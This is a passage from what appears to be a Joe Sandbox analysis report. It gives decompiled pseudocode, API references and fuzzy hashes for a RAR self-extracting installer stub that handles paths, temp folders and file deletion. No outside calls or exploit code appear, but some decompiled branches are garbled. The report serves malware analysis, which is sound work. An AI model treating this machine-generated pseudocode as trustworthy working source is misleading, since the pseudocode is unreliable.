                					_t31 = E003F3E13(_t59);
                					_t47 = 0x3a;
                					_t14 = _t31 - 1; // -1
                					_t54 = _t59 + _t14 * 2;
                					 *_t54 =  *_t54 + 1;
                					__eflags =  *_t54 - _t47;
                					if( *_t54 == _t47) {
                						_t66 = 0x30;
                						while(1) {
                							__eflags = _t54 - _t58;
                							if(_t54 <= _t58) {
                								break;
                							}
                							_t33 =  *(_t54 - 2) & 0x0000ffff;
                							_t62 = _t33;
                							__eflags = _t33 - _v4;
                							if(_t33 == _v4) {
                								break;
                							}
                							 *_t54 = _t66;
                							_t34 = _t62 + 1;
                							_t54 = _t54 + 0xfffffffe;
                							 *_t54 = _t34;
                							__eflags = _t34 - _t47;
                							if(_t34 == _t47) {
                								continue;
                							}
                							return _t34;
                						}
                						_t32 = 0x61;
                						 *_t54 = _t32;
                						return _t32;
                					}
                				} else {
                					_t31 = E003DBA1E(0, __eflags, _t58);
                					_t63 = _t31;
                					_t48 = 0x3a;
                					 *_t63 =  *_t63 + 1;
                					__eflags =  *_t63 - _t48;
                					if( *_t63 == _t48) {
                						_t67 = 0x30;
                						while(1) {
                							_v4 = _t63;
                							 *_t63 = _t67;
                							_t63 = _t63 - 2;
                							__eflags = _t63 - _t58;
                							if(_t63 < _t58) {
                								break;
                							}
                							_t39 = E003E047A( *_t63 & 0x0000ffff);
                							__eflags = _t39;
                							if(_t39 == 0) {
                								break;
                							}
                							 *_t63 =  *_t63 + 1;
                							__eflags =  *_t63 - _t48;
                							if( *_t63 == _t48) {
                								continue;
                							}
                							return _t39;
                						}
                						_t56 = _t58 + E003F3E13(_t58) * 2;
                						while(1) {
                							__eflags = _t56 - _t63;
                							if(_t56 == _t63) {
                								break;
                							}
                							 *((short*)(_t56 + 2)) =  *_t56;
                							_t56 = _t56 - 2;
                							__eflags = _t56;
                						}
                						_t37 = _v4;
                						_t57 = 0x31;
                						 *_t37 = _t57;
                						return _t37;
                					}
                				}
                				return _t31;
                			}

                APIs
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                  • Part of subcall function 003DB92D: _wcsrchr.LIBVCRUNTIME ref: 003DB944
                • _wcslen.LIBCMT ref: 003DC197
                • _wcslen.LIBCMT ref: 003DC1DF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$_wcsrchr
                • String ID: .exe$.rar$.sfx
                • API String ID: 3513545583-31770016
                • Opcode ID: 585a7172b6001a95ac59bc17100ac461c3e338edb06a2efd9c5d38e45f497371
                • Instruction ID: 64d3d029230e860a88bba5583a5881cf1c2e4d51c9bc397ec8f8ff99299d9cb9
                • Opcode Fuzzy Hash: 585a7172b6001a95ac59bc17100ac461c3e338edb06a2efd9c5d38e45f497371
                • Instruction Fuzzy Hash: AA41192357036295C737AF64A852A7AB3A8EF41744F151A0FF5816B2C1EB708E81C395
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E003DBB03(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
                				short _v4096;
                				short _v4100;
                				void* _t32;
                				long _t34;
                				void* _t40;
                				void* _t55;
                				signed short* _t62;
                				void* _t65;
                				intOrPtr _t67;
                				signed short* _t68;
                				intOrPtr _t69;
                
                				E003EEC50(0x1000);
                				_t68 = _a4;
                				_t70 =  *_t68;
                				if( *_t68 == 0) {
                					L21:
                					__eflags = 0;
                					return 0;
                				}
                				E003DBC98(_t70, _t68);
                				_t65 = E003F3E13(_t68);
                				_t32 = E003DBCC3(_t68);
                				_t71 = _t32;
                				if(_t32 == 0) {
                					_t34 = GetCurrentDirectoryW(0x7ff,  &_v4100);
                					__eflags = _t34;
                					if(_t34 == 0) {
                						goto L21;
                					}
                					__eflags = _t34 - 0x7ff;
                					if(_t34 > 0x7ff) {
                						goto L21;
                					}
                					__eflags = E003DBD9D( *_t68 & 0x0000ffff);
                					if(__eflags == 0) {
                						E003DB690(__eflags,  &_v4100, 0x800);
                						_t40 = E003F3E13( &_v4100);
                						_t67 = _a12;
                						__eflags = _t67 - _t40 + _t65 + 4;
                						if(_t67 <= _t40 + _t65 + 4) {
                							goto L21;
                						}
                						E003E0602(_a8, L"\\\\?\\", _t67);
                						E003E05DA(__eflags, _a8,  &_v4100, _t67);
                						__eflags =  *_t68 - 0x2e;
                						if(__eflags == 0) {
                							__eflags = E003DBD9D(_t68[1] & 0x0000ffff);
                							if(__eflags != 0) {
                								_t68 =  &(_t68[2]);
                							}
                						}
                						L16:
                						_push(_t67);
                						L5:
                						_push(_t68);
                						L6:
                						_push(_a8);
                						E003E05DA(_t73);
                						return 1;
                					}
                					_t14 = _t65 + 6; // 0x6
                					_t67 = _a12;
                					__eflags = _t67 - _t14;
                					if(_t67 <= _t14) {
                						goto L21;
                					}
                					E003E0602(_a8, L"\\\\?\\", _t67);
                					__eflags = 0;
                					_v4096 = 0;
                					E003E05DA(0, _a8,  &_v4100, _t67);
                					goto L16;
                				}
                				if(E003DBC98(_t71, _t68) == 0) {
                					_t55 = 0x5c;
                					__eflags =  *_t68 - _t55;
                					if( *_t68 != _t55) {
                						goto L21;
                					}
                					_t62 =  &(_t68[1]);
                					__eflags =  *_t62 - _t55;
                					if( *_t62 != _t55) {
                						goto L21;
                					}
                					_t69 = _a12;
                					_t10 = _t65 + 6; // 0x6
                					__eflags = _t69 - _t10;
                					if(_t69 <= _t10) {
                						goto L21;
                					}
                					E003E0602(_a8, L"\\\\?\\", _t69);
                					E003E05DA(__eflags, _a8, L"UNC", _t69);
                					_push(_t69);
                					_push(_t62);
                					goto L6;
                				}
                				_t2 = _t65 + 4; // 0x4
                				_t73 = _a12 - _t2;
                				if(_a12 <= _t2) {
                					goto L21;
                				} else {
                					E003E0602(_a8, L"\\\\?\\", _a12);
                					_push(_a12);
                					goto L5;
                				}
                			}

                APIs
                • _wcslen.LIBCMT ref: 003DBB27
                • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,003DA275,?,?,00000800,?,003DA23A,?,003D755C), ref: 003DBBC5
                • _wcslen.LIBCMT ref: 003DBC3B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$CurrentDirectory
                • String ID: UNC$\\?\
                • API String ID: 3341907918-253988292
                • Opcode ID: 25ae01b58b43fd13de2774e464c1313b793fa80e0c5d86fb44b18ddedea1e94d
                • Instruction ID: 1c593cf1c3baf5425a11fd77f9ccc2e641f99c3c302c80c3586496006c227a03
                • Opcode Fuzzy Hash: 25ae01b58b43fd13de2774e464c1313b793fa80e0c5d86fb44b18ddedea1e94d
                • Instruction Fuzzy Hash: 6341C477400255E6CF23AF21EC01EEBB76DBF45791F124527F814AB291EBB0DA908B50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E003ECD58(void* __ecx, void* __edx, intOrPtr __esi) {
                				intOrPtr _t221;
                				intOrPtr _t226;
                				void* _t227;
                				intOrPtr _t279;
                				long _t295;
                				signed int _t296;
                				void* _t299;
                				signed int _t300;
                				void* _t304;
                
                				L0:
                				while(1) {
                					L0:
                					 *0x41c577 = 1;
                					_t295 = 1;
                					_t221 = _t304 - 0x588c;
                					_t279 = __esi;
                					 *((intOrPtr*)(_t304 - 0x14)) = _t221;
                					if( *((short*)(_t304 - 0x588c)) != 0x3c) {
                						goto L96;
                					}
                					L86:
                					__eax = __ebp - 0x588a;
                					_push(__ebp - 0x588a);
                					__eax = E003F22C6(__ecx);
                					_pop(__ecx);
                					__ecx = 0x3e;
                					if(__eax == 0) {
                						L95:
                						__eax =  *(__ebp - 0x14);
                						goto L96;
                					}
                					L87:
                					_t103 = __eax + 2; // 0x2
                					__ecx = _t103;
                					 *(__ebp - 0x14) = _t103;
                					__ecx = 0;
                					 *__eax = __cx;
                					__eax = __ebp - 0x10c;
                					_push(0x64);
                					_push(__ebp - 0x10c);
                					__eax = __ebp - 0x588a;
                					_push(__ebp - 0x588a);
                					__eax = E003EAF98();
                					 *(__ebp - 0x20) = __eax;
                					if(__eax == 0) {
                						goto L95;
                					}
                					L88:
                					__esi = __eax;
                					while(1) {
                						L89:
                						if( *(__ebp - 0x10c) == 0) {
                							goto L95;
                						}
                						L90:
                						__eax = __ebp - 0x10c;
                						__eax = E003E1FBB(__ebp - 0x10c, L"HIDE");
                						__eax =  ~__eax;
                						asm("sbb eax, eax");
                						__edi = __edi & __eax;
                						__eax = __ebp - 0x10c;
                						__eax = E003E1FBB(__ebp - 0x10c, L"MAX");
                						if(__eax == 0) {
                							__edi = 3;
                						}
                						__eax = __ebp - 0x10c;
                						__eax = E003E1FBB(__ebp - 0x10c, L"MIN");
                						if(__eax == 0) {
                							__edi = 6;
                						}
                						_push(0x64);
                						__eax = __ebp - 0x10c;
                						_push(__ebp - 0x10c);
                						_push(__esi);
                						__esi = E003EAF98();
                						if(__esi != 0) {
                							continue;
                						} else {
                							goto L95;
                						}
                					}
                					goto L95;
                					L96:
                					if( *((intOrPtr*)(_t304 + 0x10)) != 5) {
                						L99:
                						if( *((intOrPtr*)(_t304 + 0x10)) != 4) {
                							while(1) {
                								L175:
                								_push(0x1000);
                								_t213 = _t304 - 0x15; // 0xffffa75f
                								_t214 = _t304 - 0xd; // 0xffffa767
                								_t215 = _t304 - 0x588c; // 0xffff4ee8
                								_t216 = _t304 - 0xf894; // 0xfffeaee0
                								_push( *((intOrPtr*)(_t304 + 0xc)));
                								_t226 = E003EB314(_t295, _t304);
                								_t279 =  *((intOrPtr*)(_t304 + 0x10));
                								 *((intOrPtr*)(_t304 + 0xc)) = _t226;
                								if(_t226 != 0) {
                									_t227 = _t304 - 0x588c;
                									_t299 = _t304 - 0x1b894;
                									_t296 = 6;
                									goto L2;
                								} else {
                									break;
                								}
                								L4:
                								while(E003E1FBB(_t304 - 0xf894,  *((intOrPtr*)(0x40e744 + _t300 * 4))) != 0) {
                									_t300 = _t300 + 1;
                									if(_t300 < 0xe) {
                										continue;
                									} else {
                										goto L175;
                									}
                								}
                								if(_t300 > 0xd) {
                									continue;
                								}
                								L8:
                								switch( *((intOrPtr*)(_t300 * 4 +  &M003ED41B))) {
                									case 0:
                										L9:
                										__eflags = _t279 - 2;
                										if(_t279 == 2) {
                											_t295 = 0x800;
                											E003EA64D(_t304 - 0x788c, 0x800);
                											E003DA544(E003DBDF3(__eflags, _t304 - 0x788c, _t304 - 0x588c, _t304 - 0xd894, 0x800), _t279, _t304 - 0x8894, _t300);
                											 *(_t304 - 4) = 0;
                											E003DA67E(_t304 - 0x8894, _t304 - 0xd894);
                											E003D6EDB(_t304 - 0x388c);
                											while(1) {
                												L23:
                												_push(0);
                												_t241 = E003DA5D1(_t304 - 0x8894, _t304 - 0x388c);
                												__eflags = _t241;
                												if(_t241 == 0) {
                													break;
                												}
                												L11:
                												SetFileAttributesW(_t304 - 0x388c, 0);
                												__eflags =  *(_t304 - 0x2880);
                												if(__eflags == 0) {
                													L16:
                													_t245 = GetFileAttributesW(_t304 - 0x388c);
                													__eflags = _t245 - 0xffffffff;
                													if(_t245 == 0xffffffff) {
                														continue;
                													}
                													L17:
                													_t247 = DeleteFileW(_t304 - 0x388c);
                													__eflags = _t247;
                													if(_t247 != 0) {
                														continue;
                													} else {
                														_t302 = 0;
                														_push(0);
                														goto L20;
                														L20:
                														E003D4092(_t304 - 0x1044, _t295, L"%s.%d.tmp", _t304 - 0x388c);
                														_t306 = _t306 + 0x14;
                														_t252 = GetFileAttributesW(_t304 - 0x1044);
                														__eflags = _t252 - 0xffffffff;
                														if(_t252 != 0xffffffff) {
                															_t302 = _t302 + 1;
                															__eflags = _t302;
                															_push(_t302);
                															goto L20;
                														} else {
                															_t255 = MoveFileW(_t304 - 0x388c, _t304 - 0x1044);
                															__eflags = _t255;
                															if(_t255 != 0) {
                																MoveFileExW(_t304 - 0x1044, 0, 4);
                															}
                															continue;
                														}
                													}
                												}
                												L12:
                												E003DB991(__eflags, _t304 - 0x788c, _t304 - 0x1044, _t295);
                												E003DB690(__eflags, _t304 - 0x1044, _t295);
                												_t303 = E003F3E13(_t304 - 0x788c);
                												__eflags = _t303 - 4;
                												if(_t303 < 4) {
                													L14:
                													_t266 = E003DBDB4(_t304 - 0x588c);
                													__eflags = _t266;
                													if(_t266 != 0) {
                														break;
                													}
                													L15:
                													_t269 = E003F3E13(_t304 - 0x388c);
                													__eflags = 0;
                													 *((short*)(_t304 + _t269 * 2 - 0x388a)) = 0;
                													E003EFFF0(_t295, _t304 - 0x44, 0, 0x1e);
                													_t306 = _t306 + 0x10;
                													 *((intOrPtr*)(_t304 - 0x40)) = 3;
                													_push(0x14);
                													_pop(_t272);
                													 *((short*)(_t304 - 0x34)) = _t272;
                													 *((intOrPtr*)(_t304 - 0x3c)) = _t304 - 0x388c;
                													_push(_t304 - 0x44);
                													 *0x43307c();
                													goto L16;
                												}
                												L13:
                												_t277 = E003F3E13(_t304 - 0x1044);
                												__eflags = _t303 - _t277;
                												if(_t303 > _t277) {
                													goto L15;
                												}
                												goto L14;
                											}
                											L24:
                											 *(_t304 - 4) =  *(_t304 - 4) | 0xffffffff;
                											E003DA55A(_t304 - 0x8894);
                										}
                										goto L175;
                									case 1:
                										L25:
                										__eflags = __ebx;
                										if(__ebx != 0) {
                											goto L175;
                										} else {
                											__eax =  *0x42fc94;
                											__eflags = __eax;
                											__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
                											__eflags = __eax;
                											if(__eax != 0) {
                												__eax =  *0x42fc94;
                												_pop(__ecx);
                												_pop(__ecx);
                											}
                											__bh =  *((intOrPtr*)(__ebp - 0xd));
                											__eflags = __bh;
                											if(__eflags == 0) {
                												__eax = __ebp + 0xc;
                												_push(__ebp + 0xc);
                												__esi = E003EB48E(__ecx, __edx, __eflags);
                												__eax =  *0x42fc94;
                											} else {
                												__esi = __ebp - 0x588c;
                											}
                											__eflags = __bl;
                											if(__bl == 0) {
                												__edi = __eax;
                											}
                											L33:
                											__eax = E003F3E13(__esi);
                											__eax = __eax + __edi;
                											_push(__eax);
                											_push( *0x42fc94);
                											__eax = E003F3E3E(__ecx, __edx);
                											__esp = __esp + 0xc;
                											__eflags = __eax;
                											if(__eax == 0) {
                												L37:
                												__eflags = __bh;
                												if(__bh == 0) {
                													__eax = L003F3E2E(__esi);
                												}
                												goto L175;
                											}
                											L34:
                											 *0x42fc94 = __eax;
                											__eflags = __bl;
                											if(__bl != 0) {
                												__ecx = 0;
                												__eflags = 0;
                												 *__eax = __cx;
                											}
                											L36:
                											__eax = E003F7686(__eax, __esi);
                											_pop(__ecx);
                											_pop(__ecx);
                											goto L37;
                										}
                									case 2:
                										L39:
                										__eflags = __ebx;
                										if(__ebx == 0) {
                											__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
                										}
                										goto L175;
                									case 3:
                										L41:
                										__eflags = __ebx;
                										if(__ebx != 0) {
                											goto L175;
                										}
                										L42:
                										__eflags =  *0x41a472 - __di;
                										if( *0x41a472 != __di) {
                											goto L175;
                										}
                										L43:
                										__eax = 0;
                										__edi = __ebp - 0x588c;
                										_push(0x22);
                										 *(__ebp - 0x1044) = __ax;
                										_pop(__eax);
                										__eflags =  *(__ebp - 0x588c) - __ax;
                										if( *(__ebp - 0x588c) == __ax) {
                											__edi = __ebp - 0x588a;
                										}
                										__eax = E003F3E13(__edi);
                										__esi = 0x800;
                										__eflags = __eax - 0x800;
                										if(__eax >= 0x800) {
                											goto L175;
                										} else {
                											L46:
                											__eax =  *__edi & 0x0000ffff;
                											_push(0x5c);
                											_pop(__ecx);
                											__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                											if(( *__edi & 0x0000ffff) != 0x2e) {
                												L50:
                												__eflags = __ax - __cx;
                												if(__ax == __cx) {
                													L62:
                													__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
                													__ebx = 0;
                													__eflags = 0;
                													L63:
                													_push(0x22);
                													_pop(__eax);
                													__eax = __ebp - 0x1044;
                													__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
                													_pop(__ecx);
                													_pop(__ecx);
                													__eflags = __eax;
                													if(__eax != 0) {
                														__eflags =  *(__eax + 2) - __bx;
                														if( *(__eax + 2) == __bx) {
                															__ecx = 0;
                															__eflags = 0;
                															 *__eax = __cx;
                														}
                													}
                													__eax = __ebp - 0x1044;
                													__edi = 0x41a472;
                													E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
                													__eax = E003EB1BE(__ebp - 0x1044, __esi);
                													__esi = GetDlgItem( *(__ebp + 8), 0x66);
                													__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
                													__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
                													__eax = __ebp - 0x1044;
                													__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
                													_pop(__ecx);
                													_pop(__ecx);
                													__eflags = __eax;
                													if(__eax != 0) {
                														__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
                													}
                													goto L175;
                												}
                												L51:
                												__eflags = __ax;
                												if(__ax == 0) {
                													L53:
                													__eax = __ebp - 0x1c;
                													__ebx = 0;
                													_push(__ebp - 0x1c);
                													_push(1);
                													_push(0);
                													_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                													_push(0x80000002);
                													__eax =  *0x433028();
                													__eflags = __eax;
                													if(__eax == 0) {
                														__eax = __ebp - 0x14;
                														 *(__ebp - 0x14) = 0x1000;
                														_push(__ebp - 0x14);
                														__eax = __ebp - 0x1044;
                														_push(__ebp - 0x1044);
                														__eax = __ebp - 0x24;
                														_push(__ebp - 0x24);
                														_push(0);
                														_push(L"ProgramFilesDir");
                														_push( *(__ebp - 0x1c));
                														__eax =  *0x433024();
                														_push( *(__ebp - 0x1c));
                														 *0x433008() =  *(__ebp - 0x14);
                														__ecx = 0x7ff;
                														__eax =  *(__ebp - 0x14) >> 1;
                														__eflags = __eax - 0x7ff;
                														if(__eax >= 0x7ff) {
                															__eax = 0x7ff;
                														}
                														__ecx = 0;
                														__eflags = 0;
                														 *(__ebp + __eax * 2 - 0x1044) = __cx;
                													}
                													__eflags =  *(__ebp - 0x1044) - __bx;
                													if( *(__ebp - 0x1044) != __bx) {
                														__eax = __ebp - 0x1044;
                														__eax = E003F3E13(__ebp - 0x1044);
                														_push(0x5c);
                														_pop(__ecx);
                														__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
                														if(__eflags != 0) {
                															__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
                														}
                													}
                													__esi = E003F3E13(__edi);
                													__eax = __ebp - 0x1044;
                													__eflags = __esi - 0x7ff;
                													__esi = 0x800;
                													if(__eflags < 0) {
                														__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
                													}
                													goto L63;
                												}
                												L52:
                												__eflags =  *((short*)(__edi + 2)) - 0x3a;
                												if( *((short*)(__edi + 2)) == 0x3a) {
                													goto L62;
                												}
                												goto L53;
                											}
                											L47:
                											__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                											if( *((intOrPtr*)(__edi + 2)) != __cx) {
                												goto L51;
                											}
                											L48:
                											__edi = __edi + 4;
                											__ebx = 0;
                											__eflags =  *__edi - __bx;
                											if( *__edi == __bx) {
                												goto L175;
                											}
                											L49:
                											__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
                											goto L63;
                										}
                									case 4:
                										L68:
                										__eflags =  *0x41a46c - 1;
                										__eflags = __eax - 0x41a46c;
                										 *__edi =  *__edi + __ecx;
                										__eflags =  *(__edx + 7) & __al;
                										 *__eax =  *__eax + __al;
                										__eflags =  *__eax;
                									case 5:
                										L73:
                										__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                										__ecx = 0;
                										__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                										__eflags = __eax;
                										if(__eax == 0) {
                											L80:
                											 *0x418457 = __cl;
                											 *0x418460 = 1;
                											goto L175;
                										}
                										L74:
                										__eax = __eax - 0x30;
                										__eflags = __eax;
                										if(__eax == 0) {
                											L78:
                											 *0x418457 = __cl;
                											L79:
                											 *0x418460 = __cl;
                											goto L175;
                										}
                										L75:
                										__eax = __eax - 1;
                										__eflags = __eax;
                										if(__eax == 0) {
                											goto L80;
                										}
                										L76:
                										__eax = __eax - 1;
                										__eflags = __eax;
                										if(__eax != 0) {
                											goto L175;
                										}
                										L77:
                										 *0x418457 = 1;
                										goto L79;
                									case 6:
                										goto L0;
                									case 7:
                										L106:
                										__eflags = __ebx - 1;
                										if(__eflags != 0) {
                											L123:
                											__eflags = __ebx - 7;
                											if(__ebx == 7) {
                												__eflags =  *0x41a46c - __edi;
                												if( *0x41a46c == __edi) {
                													 *0x41a46c = 2;
                												}
                												 *0x419468 = 1;
                											}
                											goto L175;
                										}
                										L107:
                										__eax = __ebp - 0x788c;
                										__edi = 0x800;
                										GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
                										__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
                										__ebx = 0;
                										__esi = 0;
                										_push(0);
                										while(1) {
                											L109:
                											_push( *0x40e724);
                											__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
                											__eax = E003DA231(0x41946a);
                											__eflags = __al;
                											if(__al == 0) {
                												break;
                											}
                											L108:
                											__esi =  &(__esi->i);
                											__eflags = __esi;
                											_push(__esi);
                										}
                										L110:
                										__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
                										__eflags =  *(__ebp - 0x588c) - __bx;
                										if( *(__ebp - 0x588c) == __bx) {
                											goto L175;
                										}
                										L111:
                										__eflags =  *0x41c575 - __bl;
                										if( *0x41c575 != __bl) {
                											goto L175;
                										}
                										L112:
                										__eax = 0;
                										 *(__ebp - 0x444) = __ax;
                										__eax = __ebp - 0x588c;
                										_push(0x2c);
                										_push(__ebp - 0x588c);
                										__eax = E003F22C6(__ecx);
                										_pop(__ecx);
                										_pop(__ecx);
                										__eflags = __eax;
                										if(__eax != 0) {
                											L119:
                											__eflags =  *(__ebp - 0x444) - __bx;
                											if( *(__ebp - 0x444) == __bx) {
                												__ebp - 0x1b894 = __ebp - 0x588c;
                												E003E0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
                												__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
                											}
                											__ebp - 0x588c = E003EADD2(__ebp - 0x588c);
                											__eax = 0;
                											 *(__ebp - 0x488c) = __ax;
                											__ebp - 0x444 = __ebp - 0x588c;
                											__eax = E003EA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
                											__eflags = __eax - 6;
                											if(__eax != 6) {
                												__eax = 0;
                												 *0x418454 = 1;
                												 *0x41946a = __ax;
                												__eax = EndDialog( *(__ebp + 8), 1);
                											}
                											goto L175;
                										}
                										L113:
                										__ax =  *(__ebp - 0x588c);
                										__esi = __ebx;
                										__eflags = __ax;
                										if(__ax == 0) {
                											goto L119;
                										}
                										L114:
                										__ecx = __ax & 0x0000ffff;
                										while(1) {
                											L115:
                											__eflags = __cx - 0x40;
                											if(__cx == 0x40) {
                												break;
                											}
                											L116:
                											__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
                											__esi =  &(__esi->i);
                											__ecx = __eax;
                											__eflags = __ax;
                											if(__ax != 0) {
                												continue;
                											}
                											L117:
                											goto L119;
                										}
                										L118:
                										__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
                										__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x444, 0x200);
                										__eax = 0;
                										__eflags = 0;
                										 *(__ebp + __esi * 2 - 0x588c) = __ax;
                										goto L119;
                									case 8:
                										L127:
                										__eflags = __ebx - 3;
                										if(__ebx == 3) {
                											__eflags =  *(__ebp - 0x588c) - __di;
                											if(__eflags != 0) {
                												__eax = __ebp - 0x588c;
                												_push(__ebp - 0x588c);
                												__eax = E003F7625(__ebx, __edi);
                												_pop(__ecx);
                												 *0x42fc9c = __eax;
                											}
                											__eax = __ebp + 0xc;
                											_push(__ebp + 0xc);
                											 *0x42fc98 = E003EB48E(__ecx, __edx, __eflags);
                										}
                										 *0x41c576 = 1;
                										goto L175;
                									case 9:
                										L132:
                										__eflags = __ebx - 6;
                										if(__ebx != 6) {
                											goto L175;
                										}
                										L133:
                										__eax = 0;
                										 *(__ebp - 0x2844) = __ax;
                										__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
                										__eax = E003F79E9( *(__ebp - 0x1b894) & 0x0000ffff);
                										__eflags = __eax - 0x50;
                										if(__eax == 0x50) {
                											 *(__ebp - 0x14) = 2;
                											__eax = 0x42cb82;
                										} else {
                											__eflags = __eax - 0x54;
                											if(__eax == 0x54) {
                												 *(__ebp - 0x14) = 7;
                												__eax = 0x42bb82;
                											} else {
                												 *(__ebp - 0x14) = 0x10;
                												__eax = 0x42db82;
                											}
                										}
                										__esi = 0x800;
                										__ebp - 0x2844 = E003E0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
                										__eax = 0;
                										 *(__ebp - 0x9894) = __ax;
                										 *(__ebp - 0x1844) = __ax;
                										__ebp - 0x19894 = __ebp - 0x688c;
                										__eax = E003E0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
                										_push(0x22);
                										_pop(__ebx);
                										__eflags =  *(__ebp - 0x688c) - __bx;
                										if( *(__ebp - 0x688c) != __bx) {
                											L141:
                											__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                											__eflags = __al;
                											if(__al != 0) {
                												goto L160;
                											}
                											L142:
                											__ax =  *(__ebp - 0x688c);
                											__esi = __ebp - 0x688c;
                											__ebx = __edi;
                											__eflags = __ax;
                											if(__ax == 0) {
                												L159:
                												__esi = 0x800;
                												goto L160;
                											}
                											L143:
                											__edi = __ax & 0x0000ffff;
                											do {
                												L144:
                												_push(0x20);
                												_pop(__eax);
                												__eflags = __di - __ax;
                												if(__di == __ax) {
                													L146:
                													__eax = 0;
                													__esi->i = __ax;
                													__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                													__eflags = __al;
                													if(__al == 0) {
                														L155:
                														__esi->i = __di;
                														goto L156;
                													}
                													L147:
                													__ebp - 0x688c = E003DA243(__ebp - 0x688c);
                													__eax = E003DA28F(__eax);
                													__eflags = __al;
                													if(__al != 0) {
                														goto L155;
                													}
                													L148:
                													_push(0x2f);
                													_pop(__ecx);
                													__eax =  &(__esi->i);
                													__ebx = __esi;
                													__eflags = __di - __cx;
                													if(__di != __cx) {
                														L150:
                														_push(0x20);
                														__esi = __eax;
                														_pop(__eax);
                														while(1) {
                															L152:
                															__eflags = __esi->i - __ax;
                															if(__esi->i != __ax) {
                																break;
                															}
                															L151:
                															__esi =  &(__esi->i);
                															__eflags = __esi;
                														}
                														L153:
                														__ecx = __ebp - 0x1844;
                														__eax = __esi;
                														__edx = 0x400;
                														L154:
                														__eax = E003E0602(__ecx, __eax, __edx);
                														 *__ebx = __di;
                														goto L156;
                													}
                													L149:
                													 *(__ebp - 0x1844) = __cx;
                													__edx = 0x3ff;
                													__ecx = __ebp - 0x1842;
                													goto L154;
                												}
                												L145:
                												_push(0x2f);
                												_pop(__eax);
                												__eflags = __di - __ax;
                												if(__di != __ax) {
                													goto L156;
                												}
                												goto L146;
                												L156:
                												__esi =  &(__esi->i);
                												__eax = __esi->i & 0x0000ffff;
                												__edi = __esi->i & 0x0000ffff;
                												__eflags = __ax;
                											} while (__ax != 0);
                											__esi = 0x800;
                											__eflags = __ebx;
                											if(__ebx != 0) {
                												__eax = 0;
                												 *__ebx = __ax;
                											}
                											goto L160;
                										} else {
                											L139:
                											__ebp - 0x19892 = __ebp - 0x688c;
                											E003E0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
                											_push(__ebx);
                											_push(__ebp - 0x688a);
                											__eax = E003F22C6(__ecx);
                											_pop(__ecx);
                											_pop(__ecx);
                											__eflags = __eax;
                											if(__eax != 0) {
                												__ecx = 0;
